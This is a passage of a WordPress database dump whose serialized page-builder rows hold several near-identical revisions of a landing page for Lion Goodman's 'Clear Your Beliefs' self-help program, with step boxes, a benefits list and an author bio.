src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:711:"[su_box title="Step 3" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that \nBlock Abundance, Love,\nRelationships, and\nManifesting What You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: 70px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2724:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<center>\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\n</center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1002, 1513, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:348:"<p>[su_box title="Step 1" box_color="#1a2d8c" radius="9"]</p><center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><p><br /> [Form id="10"]<br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:825:"[su_box title="Step 2" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:711:"[su_box title="Step 3" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that \nBlock Abundance, Love,\nRelationships, and\nManifesting What You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: 70px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2724:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<center>\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\n</center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1003, 1514, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:348:"<p>[su_box title="Step 1" box_color="#1a2d8c" radius="9"]</p><center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><p><br /> [Form id="10"]<br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:825:"[su_box title="Step 2" box_color="#1a2d8c" radius="9"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:710:"[su_box title="Step 3" box_color="#1a2d8c" radius="9"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance, Love,\nRelationships, and\nManifesting What You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: 70px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2724:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<center>\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\n</center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1004, 1515, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:341:"<p>[su_box title="Step 1" box_color="#1a2d8c" radius="8"]</p><center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><p>[Form id="10"]<br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:825:"[su_box title="Step 2" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:710:"[su_box title="Step 3" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: 70px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2724:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m 